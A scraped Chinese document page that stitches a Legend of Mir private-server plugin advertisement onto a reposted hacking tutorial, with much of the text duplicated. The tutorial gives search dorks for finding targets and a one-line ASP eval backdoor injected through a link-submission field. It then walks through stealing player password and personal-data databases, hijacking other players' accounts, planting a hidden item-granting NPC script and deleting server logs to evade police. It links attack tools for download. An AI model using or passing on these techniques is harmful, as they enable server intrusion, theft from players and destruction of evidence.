传奇私服gom日志服务器怎么设置查看gom引擎显示装备来源交易,拣取等动作的记录
点击联系发帖人
时间:2018-01-31 18:12
 上传我的文档
 下载
 收藏
粉丝量:12
该文档贡献者很忙,什么也没留下。
 下载此文档
春天引擎更新日志
下载积分:800
内容提示:春天引擎更新日志
文档格式:DOC|
浏览次数:145|
上传日期: 09:58:50|
文档星级:
全文阅读已结束,如果下载本文需要使用
 800 积分
下载此文档
该用户还上传了这些文档
春天引擎更新日志
关注微信公众号还在使用没用的反挂登陆器吗?
插件自带强大的反挂功能,支持绝对封闭外挂的远程仓库,支持绝对封闭外挂的任何种类自动拣取物品,封暗杀,封三格,封无限刀,封加速等
脚本加密防盗
插件能对所有脚本进行加密,为您的劳动成果保驾护航,避免被盗
非法交易拦截
插件能对具有标志物品等价交换所产生的复制进行拦截(比如交易,摆摊).彻底防止BlueM2可复制的问题
弹出验证组合图形采用的Run插件形式.图形预缆请参考Run插件主站展示图
直接嵌入引擎处理数据无须任何脚本或第三方软件支持即可完成数据处理任务
游戏引擎上加载插件模块.使用汇编代码无缝嵌入引擎处理机制内部结构.不但能及时共享引擎内部全部数据
并且使用内联汇编让插件与引擎内部机制成为一体.从而方便简单可靠的能对引擎功能做出增加.调整.和修改的目的
得到操作引擎内部数据结构的权限后.插件将可以对现有的引擎进行没有的功能扩展.现有的功能升级或代码改造优化
只需要加载一个插件。参数也只需要设置一次。无缝对接M2。无需要任何脚本辅助支持。RUN无法做到的封双装备位置错误穿戴 增加M2新功能等
同步M2内核数据 无需额外资源申请 检测更彻底。由M2内核处理后的数据做标准 无需担心网络差异问题
M2插件是同步内核操作。M2能做的。插件就能做。M2不能做的。插件也可以做(升级功能)
高性能的引擎扩展功能插件模块
特点:. 让已经处于停滞阶段的BlueM2再次得到功能升级.让现有BUG得到修复.内核全汇编编写.比原Blue代码更稳定
我们不再经过引擎输出函数去转换执行插件代码再把执行结果数据回流到引擎处理
采用有针对性的内联把插件直接变为引擎的一部分.必然数据也是共同享用和修改的
所以执行效率上必然会提升
非法交易拦截:插件能对具有标志物品等价交换所产生的复制进行拦截(比如交易,摆摊).彻底防止BlueM2可复制的问题
脚本加密防盗:插件能对所有脚本进行加密,为您的劳动成果保驾护航,避免被盗
强大的优势 + 极高的效率 + M2引擎程序再次得到升级支持
在运行游戏引擎上加载插件模块.使用汇编代码无缝嵌入引擎处理机制内部结构.不但能及时共享引擎内部全部数据
并且使用内联汇编让插件与引擎内部机制成为一体.从而方便简单可靠的能对引擎功能做出增加.调整.和修改的目的
得到操作引擎内部数据结构的权限后.插件将可以对现有的引擎进行没有的功能扩展.现有的功能升级或代码改造优化
作为在最末端辅助处理引擎网络数据.将不再出现兼容性问题.能够完美支持任何来自客户端的网络连接数据
插件可以 拦截非法跳转QF脚本刷元宝和会员. 内置默认是打开的.
脚本漏洞拦截. 非法交易拦截。内置默认是打开的.
查看在线人物里双击人物可弹出高级显示功能。入侵传奇sf数据库+拿服务器权限 - 国内最大的教学动画下载站点 - 华盟网 - http://www.77169.com
&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&
您现在的位置:&&>>&&>>&&>>&动画信息
入侵传奇sf数据库+拿服务器权限
文件大小:0 K
动画性质:未知
动画作者:
类型格式:屏幕录像专家
责任编辑:华夏总编辑
下载次数总计:
添加时间:
解压密码:www.77169.org&或 &www.77169.com
早几天应几个好兄弟的强烈要求&要我做个传奇私服拿下GM号&给自己刷装备的&动画片& &&&&&&&&&&&&&&&&&&&&&&&&&&此动画片献给我最好的好兄弟& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&^_^ &&&黑暗中的矩阵&翻版王&oоО○&踏浪而來&谈猫&小猫&一夜一支烟&光の神諭&無_敵&莣記鐹弆→EX&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&^_^ &&&&&&&&&&&&&&&&&&&&&&&&今天是传奇私服&&&&&& &&&&你们可以用百度&搜索传奇&inurl:tuku&&或者&传奇&inurl:wplm.htm&&再或者& &&&&&&&&&&&&&&&&&&&&&&&传奇&inurl:coolsites.asp & 今天演示的是这个地址&&&&&&&&&&&&&湘潭&&&枫无痕&&&录制&&&?action=login http://chat.01jh.com http://chat.01jh.com/coolsites.asp&友情连接的地址&&& &&我已经找好了&兄弟们想刷装备的要快哦&要不都被我完了哟 这套网站的程序是&eihomemir&传奇私服全站系统&他的数据库有8个&在DATA目录下&数据库的名字分别是admin.asp&article.asp&diary.asp&down.aspgb.asp&main.asp&news.asp和sites.asp&&竟然是asp的数据库&那么我们是不是就可以插asp到他数据库呢&答案是肯定的&当然可以插&怎么插?&先到他网站申请友情连接的地方&&在图片连接里面&写上&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 11&SCRIPT&RUNAT=SERVER&LANGUAGE=javascript&eval(Request.form('#')+'')&/SCRIPT&&&呵呵这个一看就是&冰狐浪子微型ASP后门&&因为他网站程序的数据库是&ASP的后缀&所以我们可以插ASP的进去&运行&& &我试了好多网站&都可以KO&嘻嘻&&10个有9个可以进的啦&快刷装备去啊& 把下面的数据库下载到本地来&&用&UltraEdit-32打开&找到GM号子和密码&当然你也可以自己加个进去 自己加GM的时候要注意&*和你的帐号有个空格&要注意了&加到AdminList.txt文件你&你就是GM了&记得还要重读GM文件&要不然要重启计算机的&&你说他改了命令&&你不知道命令&呵呵&当然有办法了&到网上下载传奇私服GM命令修改器&在下载他D:\mirserver3\Mir200\M2server.exe&把M2server.exe放到你下载的传奇私服GM命令修改器同一个目录&读他的命令&就可以看到他修改的命令了&&嘻嘻& D:\mirserver3\Mir200\Envir\AdminList.txt&&这里是GM的帐号&嘻嘻&你自己也可以加个GM进去& 我们要拿GM号子&当然是看看&AdminList.txt有那些GM了& D:\mirserver3\Mud2\DBSrv200\FDB\hum.db&&&&这个数据库里面是&号子 D:\mirserver3\Mud2\Logsrv\IdDB\id.db&&这个数据库里面是&密码& &GM也当了&装备也刷了&最后该清理日志了&日志在D:\mirserver3\gamelog\logdatasrv\logbase&下是所有玩家的标志&&每十分钟一个记录&&打开他会出现&类似&1&0&0&5&0&333&333&枫无痕&屠龙&& &00:01:01&&&这个日志的意思是&枫无痕在地图0的坐标333&333制造了&屠龙&其中第4个数字是玩家使用物品的动作&7是仍物品&4是拣物品&&8是玩家之间的交易&9是买物品&10是卖物品&11是使用物品&5是死了后掉的物品&19是被杀&1是存物品&0是取物品&6是毁物品&5是制造物品&嘻嘻 这里我们用传奇私服GM命令修改器看他的D:\mirserver3\Mir200\M2server.exe的命令&文件下载到本地来看他制造物品是什么&这样可以制造个&武器是&255&道术255&魔法255&极品装备了&好多有用的命令哦&还有无敌&记得先要开&GM模式&才可以哦&&GM模式的命令也是用这个软件看&&他这里的GM模式改成了张祥模式&无敌竟然是&张祥无敌&&&看来GM的真名字叫张祥&嘻嘻&&
下面的是我兄弟&黑暗中的矩阵提供的&你们看看 一起分享,嘿嘿!如果你拿到了webshell以后,还是在mirserver\Mir200\Envir\adminlist.txt里面添加GM帐号的话,那不妨看看下文,相信你会有收获的,因为你的方法隐蔽性太底! 本文中所用到的所有方法,都可以在webshell下完成,无须提升权限,前提是:web服务器和传奇服务器在同一台计算机。因此必须先确定传奇服务和web服务是否为一台主机,我们只要在asp上输入命令netstat&-an查看它所开端口,经过查看后发现它开了这两个传奇服务端端口(图一),可以得出传奇服务也在这台主机上。这样就比较好办了,可以通过asp在它的硬盘里寻觅传奇目录 一般默认安装为:D:\mirserver\&下。找到了传奇的目录我们就可以开始编写传奇私服里的Rookit了,酷吧! 一、一切皆有可能--修改怪物暴率 &&&& &&&&你是否还在因为不知道好装备在哪里打,或者打了老是不爆而而烦恼呢?其实打打稻草人、挖挖洞蛆,也有好装备爆的,怎么不相信?那么一起来吧,我要告诉你的是:一切皆有可能! &&&&修改修改怪物爆东西几率,在mirserver/Mir200/Envir/MonItems&下,所有的怪物这里都有名字,好装备都设置在一些刷得很少,而且很难打的怪物,暴装备的几率一般为1/4000&,也就是说打4000个这种怪物才爆一样,这样有多难啊。我经过考虑后决定修改“洞蛆”,让所有的装备都在这里暴。因为洞蛆比较难找到,经验少,一般没有玩家会杀它,而且杀死后东西不会暴出来,必须要挖,有很高的隐蔽性(图二)。 &&&&但是这样还不够,我们做事要不留尾巴不然怎么叫传奇私服里的Rootkit。为了避免玩家不小心发现这个已经变成极品装备仓库的洞蛆,我们还要去一个地方设置一下。跟我来,在&mirserver/Mir200/Envir/MonGen.txt&这里可以设置怪物刷新时出现的坐标。本来有几个地方都会有洞蛆出现,现在我们把其它地方的洞蛆都取消,只设置在&半兽古墓&一个没有人来的地方并且调整刷新的范围为0,数量为1,时间为30分钟出一次(图三),这样就最大限度的避免了其他玩家与我们的极品装备仓库---洞蛆接触。嘿嘿,众乐乐,不如独乐乐! 二、盗你没商量--下载传奇数据库& &&&& &&&&看着别人身上的极品装备眼红吗?其实你也可以拥有的。完全不要盗号木马,我们可以在服务器上动点手脚,达到盗人于无形的目的! 传奇有两个数据库文件很重要, 一是:mirserver/Mud2/Logsrv/IdDB/Id.db,它记录了所有玩家注册时的密码、以及密码提示问题、答案、电话号码、生日,等很多信息。拿到这个文件,玩家可以说是任你宰杀了,特别是那些喜欢用一个密码的,惨不可言,QQ、油箱,等等都有可能被盗。所以说玩传奇私服是非常危险的,大家还是去玩盛大安全点。(各位大哥,不要拿鸡蛋扔我啊!) 二是:mirserver/Mud2/DBSrv200/FDB/Hum.DB,记录了所有玩家的人物名所对应的ID。 现在我们先把这两个数据库下载到本地,先用记事本打开Hum.DB,查找你要盗的那位玩家的人物名,不用和他商量了啦,嘿嘿! 在人物名后面紧跟着的就是玩家的ID,把找到的ID复制一下,然后打开Id.db,查找ID对应的玩家密码,ID后面紧跟着的就是密码了。 接着去登录传奇,如果他还是注册时候的密码,那你就可以下装备了。不过有时候也会遇到玩家修改过密码的情况,这个时候就要用到一个小工具:传奇强行登录器。使用前首先把文件复制到传奇目录下,打开传奇强行登录器按上面的提示填写(图四),在检测通过后点击登录。 先用自己的号上,到人物选择,到这里慢点,在开始处有2个框,细心点可以发现是自己的ID和人物名字,(图五)还犹豫什么,把ID人物名字替换成要黑的号。点开始,进去了吗?哈哈哈哈,下光装备,你也可以把GM的ID拿来玩,只是清理传奇日志的时候会多几项类容,但是GM命令里面有一条对上面介绍的修改怪物暴率刷装备的方法非常有用,可以重读怪物爆机文件,这样不用等传奇服务重起,我们修改的东西就可以生效。 三、我的地盘我做主--编写领装备NPC&& &&&&什么是NPC呢?它是Non-Player-Character(非玩家控制人物)的简写,也就是说其行为是& 由系统控制的,例如药店店里的老板,安全区的文明宣传员都是NPC。既然游戏是给玩家玩的,那为什么玩家不可以做主呢?不要别的,我们自己来写个领装备的ncp吧!先熟悉下主要的语言: ------------------------------------------------------------------------------------------- &&&&[@main]&这样的段落可以被goto&@main识别 &&&&#if&条件语句(#if&如果...) &&&&checknamelist&读取文件中的名单&(例如:checknamelist&chengyuan.txt) &&&&#say&结果语句(#say&接显示对话内容) &&&&&$USERname&&你的姓名 &&&&@exit&关闭窗口 &&&&give&赠与物品(例如:give&屠龙&1) ------------------------------------------------------------------------------------------- &&&&&怎么样,是不是比易语言还容易啊?并不像传说中那么高深。有了上面的知识,我们就可以自己写NPC了。 &&写NPC要达到的目的是别人点这个NPC的时候,只出一段提示,而我点的时候却可以领装备。那怎样实现呢?我们可以先把一个有自己人物名的txt文件放到服务器上,然后用checknamelist&语句来读取这个文件里面的人物名,设置只有这个人物才可以领取装备,其他玩家只有点@exit,哈哈!但是一定记得把txt文件和NPC一起放在mirserver/Mir200/Envir/Market_def/下。 &&&&要让其他玩家不怀疑,隐蔽性非常重要,最好是仿照传奇服务器上的版本信息来NPC来写,因为传奇私服服务端各有不同,大多是从网上下载来的,管理员自己都不是很清楚,其他玩家就更不用说了。我们再联系NPC放置的位置来巧妙的设置一下,比如放在比齐赌庄里面的NPC可以加入提示信息:赌庄正在装修,暂时停止开放!(光盘里有我写好的npc文件,大家看看迷惑性怎样?) &&&&NPC脚本写好后,必须在&mirserver/Mir200/Envir/MerChant.txt&里面设定调用我们写的NPC,另外这里还可以设置NPC的坐标、NPC的人物名称、数量、代码、刷新时间。可能大家不是很明白&代码&是什么意思,其实他就是npc的外形,屠夫、铁匠、老兵,等都有自己的外形特征,有胖有瘦千万不要张冠李戴了。另外在设置/Market_def/下的NPC文件名的时候特别要注意,正确的应该是MerChant.txt中的调用文件加上地图名,要是文件名对不上是不会调用的(图六)。 四、传奇日志的清理 &&&&说到这里大家一定很奇怪,传奇的日志也用得上清理吗?其实不然,传奇有一套非常完善的日志记录,甚至可以成为警察叔叔查获你的证据。去年我通过当时最流行的数据库漏洞,进了一台网站服务器,不想上面还开了传奇服务。我马上就给自己弄了一个GM号,但是没几天就让发现了,他们还在网站上警告了我,当时我并没有弄清楚他们怎么发现的,只是被他们的技术非惊呆了,因为我是在肉鸡进了HTTP代理再去的他的网站,IP照样被查到。但是现在看来应该是传奇日志出卖了我。下面我把这些让人心烦的日志都列出来,大家在办完事之后一定记得把脚印擦干净! ------------------------------------------------------------------------------------------- 1、mirserver/Gamelog/logdatasrv/log/base&&&&游戏中所有与物品有关记录、交易、拣取、甚至是什么怪物爆的、以及所出物品的坐标和编号&&& &&&&利用&修改怪物暴率&刷装备的这个地方要特别注意删除 2、mirserver/Mir200/conlog/&&&&&登录时的id、人物、在线时间、ip &&& &&&利用&下载传奇数据库&盗装备的小心了,这里可是记录了你的IP地址的 3、mirserver/Mir200/LOG/&&&&&&&&&&&&&&&&&&&&GM的所有操作 &&&上过GM号的朋友应该注意的地方,另外千万不要用GM给自己刷装备,因为就算你把这个的记录删了,在&传奇心意控制器&的窗口上还是可以看到你的操作 4、mirserver/Mud2/Logsrv/chrlog/&&&注册时的id&和密码、密码保护、以及修改过的密码 &&&下载传奇数据库后,如果得到的密码不对,请来这里查看
5、mirserver/Mud2/Logsrv/conlog年-月/&&&&&登录的帐号和IP &&这里同样是利用&下载传奇数据库&盗装备的要注意的地方 ------------------------------------------------------------------------------------------- &&&&看了上面的内容,是不是有一种掩不住的冲动,原来传奇私服可以这样玩,不要等了,自己去实验吧!发挥一下DIY的能力把上面的几种方法组合一下,我相信最完美的Rootkit就会在你手下诞生! 至于webshell的隐藏问题请看我的另一篇文章:美人计--图片asp木马。&
&1.领装备npc脚本 http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.rar&&& 2.传奇强行登录器 http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.exe 3.相关图片 http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.rar 此文写于2004.10月&, 四、传奇日志的清理 在网上没有见过,这类资料(至少我没有见过)呵呵!~~ 这也是大家没有注意的地方,小心警察叔叔啊&~~
(只显示最新5条。评论内容 只代表网友观点,与本站立场无关!)
* 游客填写
评论内容:
请遵守及中华人民共和国其他各项有关法律法规。
严禁发表危害国家安全、损害国家利 益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容 的评论 。
用户需对自己在使用本站服务过程中 的行为承担法律责任(直接或间接导致的)。
本站管理员有权保留或删除评论内容 。
评论内容只代表网友个人观点,与本网 站立场无关。
Copyright @ .COM Inc. All rights reserved. 华盟网 版权所有 华安普特提供网络带宽传奇私服里的Rootkit设置
传奇私服,让我欢喜,让我忧!自从看了十月Neeao同档(即:同买x档案),写的"最大的私服系统《武易传奇》漏洞的发现过程"我就心情沉重,手里拿着二十来个传奇私服的webshell,就是不知道怎么给自己弄点装备,作为一个传奇爱好者,世界上最大的痛苦莫过如此。
&&&就这样郁闷了几天才抽出时间来琢磨刷装备的办法,经过不断的收集资料,不断的实践,终于有所成绩。
找到了实用性和隐蔽性都非常高的刷装备办法,简直和linux里的Rootkit不分上下。现在把它写出来和大家一起分享,嘿嘿!如果你拿到了webshell以后,还是在mirserver\Mir200\Envir\adminlist.txt里面添加GM帐号的话,那不妨看看下文,相信你会有收获的,因为你的方法隐蔽性太底!
本文中所用到的所有方法,都可以在webshell下完成,无须提升权限,前提是:web服务器和传奇服务器在同一台计算机。因此必须先确定传奇服务和web服务是否为一台主机,我们只要在asp木马上输入命令netstat
-an查看它所开端口,经过查看后发现它开了这两个传奇服务端端口(图一),可以得出传奇服务也在这台主机上。这样就比较好办了,可以通过asp木马在它的硬盘里寻觅传奇目录
一般默认安装为:D:\mirserver\
下。找到了传奇的目录我们就可以开始编写传奇私服里的Rookit了,酷吧!
一、一切皆有可能--修改怪物暴率
&&&&你是否还在因为不知道好装备在哪里打,或者打了老是不爆而而烦恼呢?其实打打稻草人、挖挖洞蛆,也有好装备爆的,怎么不相信?那么一起来吧,我要告诉你的是:一切皆有可能!
&&&&修改修改怪物爆东西几率,在mirserver/Mir200/Envir/MonItems
下,所有的怪物这里都有名字,好装备都设置在一些刷得很少,而且很难打的怪物,暴装备的几率一般为1/4000
,也就是说打4000个这种怪物才爆一样,这样有多难啊。我经过考虑后决定修改"洞蛆",让所有的会员装备都在这里暴。因为洞蛆比较难找到,经验少,一般没有玩家会杀它,而且杀死后东西不会暴出来,必须要挖,有很高的隐蔽性(图二)。
&&&&但是这样还不够,我们做事要不留尾巴不然怎么叫传奇私服里的Rootkit。为了避免玩家不小心发现这个已经变成极品装备仓库的洞蛆,我们还要去一个地方设置一下。跟我来,在
mirserver/Mir200/Envir/MonGen.txt
这里可以设置怪物刷新时出现的坐标。本来有几个地方都会有洞蛆出现,现在我们把其它地方的洞蛆都取消,只设置在"半兽古墓"一个没有人来的地方并且调整刷新的范围为0,数量为1,时间为30分钟出一次(图三),这样就最大限度的避免了其他玩家与我们的极品装备仓库---洞蛆接触。嘿嘿,众乐乐,不如独乐乐!
二、盗你没商量--下载传奇数据库
&&&&看着别人身上的极品装备眼红吗?其实你也可以拥有的。完全不要盗号木马,我们可以在服务器上动点手脚,达到盗人于无形的目的!
传奇有两个数据库文件很重要,
一是:mirserver/Mud2/Logsrv/IdDB/Id.db,它记录了所有玩家注册时的密码、以及密码提示问题、答案、电话号码、生日,等很多信息。拿到这个文件,玩家可以说是任你宰杀了,特别是那些喜欢用一个密码的,惨不可言,QQ、油箱,等等都有可能被盗。所以说玩传奇私服是非常危险的,大家还是去玩盛大安全点。(各位大哥,不要拿鸡蛋扔我啊!)
二是:mirserver/Mud2/DBSrv200/FDB/Hum.DB,记录了所有玩家的人物名所对应的ID。
现在我们先把这两个数据库下载到本地,先用记事本打开Hum.DB,查找你要盗的那位玩家的人物名,不用和他商量了啦,嘿嘿!
在人物名后面紧跟着的就是玩家的ID,把找到的ID复制一下,然后打开Id.db,查找ID对应的玩家密码,ID后面紧跟着的就是密码了。
接着去登录传奇,如果他还是注册时候的密码,那你就可以下装备了。不过有时候也会遇到玩家修改过密码的情况,这个时候就要用到一个小工具:传奇强行登录器。使用前首先把文件复制到传奇目录下,打开传奇强行登录器按上面的提示填写(图四),在检测通过后点击登录。
先用自己的号上,到人物选择,到这里慢点,在开始处有2个框,细心点可以发现是自己的ID和人物名字,(图五)还犹豫什么,把ID人物名字替换成要黑的号。点开始,进去了吗?哈哈哈哈,下光装备,你也可以把GM的ID拿来玩,只是清理传奇日志的时候会多几项类容,但是GM命令里面有一条对上面介绍的修改怪物暴率刷装备的方法非常有用,可以重读怪物爆机文件,这样不用等传奇服务重起,我们修改的东西就可以生效。
三、我的地盘我做主--编写领装备NPC&&
&&&&什么是NPC呢?它是Non-Player-Character(非玩家控制人物)的简写,也就是说其行为是
由系统控制的,例如药店店里的老板,安全区的文明宣传员都是NPC。既然游戏是给玩家玩的,那为什么玩家不可以做主呢?不要别的,我们自己来写个领装备的ncp脚本吧!先熟悉下主要的脚本语言:
-------------------------------------------------------------------------------------------
&&&&[@main]
这样的段落可以被goto @main识别
条件语句(#if 如果...)
&&&&checknamelist
读取文件中的名单 (例如:checknamelist chengyuan.txt)
结果语句(#say 接显示对话内容)
&&&&&$USERname&
赠与物品(例如:give 屠龙 1)
-------------------------------------------------------------------------------------------
&&&&&怎么样,是不是比易语言还容易啊?并不像传说中那么高深。有了上面的脚本知识,我们就可以自己写NPC脚本了。
&&写NPC脚本要达到的目的是别人点这个NPC的时候,只出一段提示,而我点的时候却可以领装备。那怎样实现呢?我们可以先把一个有自己人物名的txt文件放到服务器上,然后用checknamelist
语句来读取这个文件里面的人物名,设置只有这个人物才可以领取装备,其他玩家只有点@exit,哈哈!但是一定记得把txt文件和NPC一起放在mirserver/Mir200/Envir/Market_def/下。
&&&&要让其他玩家不怀疑,隐蔽性非常重要,最好是仿照传奇服务器上的版本信息来NPC来写,因为传奇私服服务端各有不同,大多是从网上下载来的,管理员自己都不是很清楚,其他玩家就更不用说了。我们再联系NPC放置的位置来巧妙的设置一下,比如放在比齐赌庄里面的NPC可以加入提示信息:赌庄正在装修,暂时停止开放!(光盘里有我写好的npc文件,大家看看迷惑性怎样?)
&&&&NPC脚本写好后,必须在
mirserver/Mir200/Envir/MerChant.txt
里面设定调用我们写的NPC,另外这里还可以设置NPC的坐标、NPC的人物名称、数量、代码、刷新时间。可能大家不是很明白"代码"是什么意思,其实他就是npc的外形,屠夫、铁匠、老兵,等都有自己的外形特征,有胖有瘦千万不要张冠李戴了。另外在设置/Market_def/下的NPC文件名的时候特别要注意,正确的应该是MerChant.txt中的调用文件加上地图名,要是文件名对不上是不会调用的(图六)。
四、传奇日志的清理
&&&&说到这里大家一定很奇怪,传奇的日志也用得上清理吗?其实不然,传奇有一套非常完善的日志记录,甚至可以成为警察叔叔查获你的证据。去年我通过当时最流行的数据库注入漏洞,进了一台网站服务器,不想上面还开了传奇服务。我马上就给自己弄了一个GM号,但是没几天就让发现了,他们还在网站上警告了我,当时我并没有弄清楚他们怎么发现的,只是被他们的技术非惊呆了,因为我是在肉鸡进了HTTP代理再去的他的网站,IP照样被查到。但是现在看来应该是传奇日志出卖了我。下面我把这些让人心烦的日志都列出来,大家在办完事之后一定记得把脚印擦干净!
-------------------------------------------------------------------------------------------
1、mirserver/Gamelog/logdatasrv/log/base&&&&游戏中所有与物品有关记录、交易、拣取、甚至是什么怪物爆的、以及所出物品的坐标和编号&&&
&&&&利用"修改怪物暴率"刷装备的这个地方要特别注意删除
2、mirserver/Mir200/conlog/&&&&&登录时的id、人物、在线时间、ip
&&&利用"下载传奇数据库"盗装备的小心了,这里可是记录了你的IP地址的
3、mirserver/Mir200/LOG/&&&&&&&&&&&&&&&&&&&&GM的所有操作
&&&上过GM号的朋友应该注意的地方,另外千万不要用GM给自己刷装备,因为就算你把这个的记录删了,在"传奇心意控制器"的窗口上还是可以看到你的操作
4、mirserver/Mud2/Logsrv/chrlog/&&&注册时的id
和密码、密码保护、以及修改过的密码
&&&下载传奇数据库后,如果得到的密码不对,请来这里查看
5、mirserver/Mud2/Logsrv/conlog年-月/&&&&&登录的帐号和IP
&&这里同样是利用"下载传奇数据库"盗装备的要注意的地方
-------------------------------------------------------------------------------------------
&&&&看了上面的内容,是不是有一种掩不住的冲动,原来传奇私服可以这样玩,不要等了,自己去实验吧!发挥一下DIY的能力把上面的几种方法组合一下,我相信最完美的Rootkit就会在你手下诞生!
至于webshell的隐藏问题请看我的另一篇文章:美人计--图片asp木马。
1.领装备npc脚本
http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.rar&&&
2.传奇强行登录器
http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.exe
3.相关图片
http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.rar
此文写于2004.10月 ,
四、传奇日志的清理
在网上没有见过,这类资料(至少我没有见过)呵呵!~~
这也是大家没有注意的地方,小心警察叔叔啊 ~~
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。}
 下载
 收藏
粉丝量:12
该文档贡献者很忙,什么也没留下。
 下载此文档
春天引擎更新日志
下载积分:800
内容提示:春天引擎更新日志
文档格式:DOC|
浏览次数:145|
上传日期: 09:58:50|
文档星级:
全文阅读已结束,如果下载本文需要使用
 800 积分
下载此文档
该用户还上传了这些文档
春天引擎更新日志
关注微信公众号还在使用没用的反挂登陆器吗?
插件自带强大的反挂功能,支持绝对封闭外挂的远程仓库,支持绝对封闭外挂的任何种类自动拣取物品,封暗杀,封三格,封无限刀,封加速等
脚本加密防盗
插件能对所有脚本进行加密,为您的劳动成果保驾护航,避免被盗
非法交易拦截
插件能对具有标志物品等价交换所产生的复制进行拦截(比如交易,摆摊).彻底防止BlueM2可复制的问题
弹出验证组合图形采用的Run插件形式.图形预缆请参考Run插件主站展示图
直接嵌入引擎处理数据无须任何脚本或第三方软件支持即可完成数据处理任务
游戏引擎上加载插件模块.使用汇编代码无缝嵌入引擎处理机制内部结构.不但能及时共享引擎内部全部数据
并且使用内联汇编让插件与引擎内部机制成为一体.从而方便简单可靠的能对引擎功能做出增加.调整.和修改的目的
得到操作引擎内部数据结构的权限后.插件将可以对现有的引擎进行没有的功能扩展.现有的功能升级或代码改造优化
只需要加载一个插件。参数也只需要设置一次。无缝对接M2。无需要任何脚本辅助支持。RUN无法做到的封双装备位置错误穿戴 增加M2新功能等
同步M2内核数据 无需额外资源申请 检测更彻底。由M2内核处理后的数据做标准 无需担心网络差异问题
M2插件是同步内核操作。M2能做的。插件就能做。M2不能做的。插件也可以做(升级功能)
高性能的引擎扩展功能插件模块
特点:. 让已经处于停滞阶段的BlueM2再次得到功能升级.让现有BUG得到修复.内核全汇编编写.比原Blue代码更稳定
我们不再经过引擎输出函数去转换执行插件代码再把执行结果数据回流到引擎处理
采用有针对性的内联把插件直接变为引擎的一部分.必然数据也是共同享用和修改的
所以执行效率上必然会提升
非法交易拦截:插件能对具有标志物品等价交换所产生的复制进行拦截(比如交易,摆摊).彻底防止BlueM2可复制的问题
脚本加密防盗:插件能对所有脚本进行加密,为您的劳动成果保驾护航,避免被盗
强大的优势 + 极高的效率 + M2引擎程序再次得到升级支持
在运行游戏引擎上加载插件模块.使用汇编代码无缝嵌入引擎处理机制内部结构.不但能及时共享引擎内部全部数据
并且使用内联汇编让插件与引擎内部机制成为一体.从而方便简单可靠的能对引擎功能做出增加.调整.和修改的目的
得到操作引擎内部数据结构的权限后.插件将可以对现有的引擎进行没有的功能扩展.现有的功能升级或代码改造优化
作为在最末端辅助处理引擎网络数据.将不再出现兼容性问题.能够完美支持任何来自客户端的网络连接数据
插件可以 拦截非法跳转QF脚本刷元宝和会员. 内置默认是打开的.
脚本漏洞拦截. 非法交易拦截。内置默认是打开的.
查看在线人物里双击人物可弹出高级显示功能。入侵传奇sf数据库+拿服务器权限 - 国内最大的教学动画下载站点 - 华盟网 - http://www.77169.com
&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&&|&
您现在的位置:&&>>&&>>&&>>&动画信息
入侵传奇sf数据库+拿服务器权限
文件大小:0 K
动画性质:未知
动画作者:
类型格式:屏幕录像专家
责任编辑:华夏总编辑
下载次数总计:
添加时间:
解压密码:www.77169.org&或 &www.77169.com
早几天应几个好兄弟的强烈要求&要我做个传奇私服拿下GM号&给自己刷装备的&动画片& &&&&&&&&&&&&&&&&&&&&&&&&&&此动画片献给我最好的好兄弟& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&^_^ &&&黑暗中的矩阵&翻版王&oоО○&踏浪而來&谈猫&小猫&一夜一支烟&光の神諭&無_敵&莣記鐹弆→EX&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&^_^ &&&&&&&&&&&&&&&&&&&&&&&&今天是传奇私服&&&&&& &&&&你们可以用百度&搜索传奇&inurl:tuku&&或者&传奇&inurl:wplm.htm&&再或者& &&&&&&&&&&&&&&&&&&&&&&&传奇&inurl:coolsites.asp & 今天演示的是这个地址&&&&&&&&&&&&&湘潭&&&枫无痕&&&录制&&&?action=login http://chat.01jh.com http://chat.01jh.com/coolsites.asp&友情连接的地址&&& &&我已经找好了&兄弟们想刷装备的要快哦&要不都被我完了哟 这套网站的程序是&eihomemir&传奇私服全站系统&他的数据库有8个&在DATA目录下&数据库的名字分别是admin.asp&article.asp&diary.asp&down.aspgb.asp&main.asp&news.asp和sites.asp&&竟然是asp的数据库&那么我们是不是就可以插asp到他数据库呢&答案是肯定的&当然可以插&怎么插?&先到他网站申请友情连接的地方&&在图片连接里面&写上&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& 11&SCRIPT&RUNAT=SERVER&LANGUAGE=javascript&eval(Request.form('#')+'')&/SCRIPT&&&呵呵这个一看就是&冰狐浪子微型ASP后门&&因为他网站程序的数据库是&ASP的后缀&所以我们可以插ASP的进去&运行&& &我试了好多网站&都可以KO&嘻嘻&&10个有9个可以进的啦&快刷装备去啊& 把下面的数据库下载到本地来&&用&UltraEdit-32打开&找到GM号子和密码&当然你也可以自己加个进去 自己加GM的时候要注意&*和你的帐号有个空格&要注意了&加到AdminList.txt文件你&你就是GM了&记得还要重读GM文件&要不然要重启计算机的&&你说他改了命令&&你不知道命令&呵呵&当然有办法了&到网上下载传奇私服GM命令修改器&在下载他D:\mirserver3\Mir200\M2server.exe&把M2server.exe放到你下载的传奇私服GM命令修改器同一个目录&读他的命令&就可以看到他修改的命令了&&嘻嘻& D:\mirserver3\Mir200\Envir\AdminList.txt&&这里是GM的帐号&嘻嘻&你自己也可以加个GM进去& 我们要拿GM号子&当然是看看&AdminList.txt有那些GM了& D:\mirserver3\Mud2\DBSrv200\FDB\hum.db&&&&这个数据库里面是&号子 D:\mirserver3\Mud2\Logsrv\IdDB\id.db&&这个数据库里面是&密码& 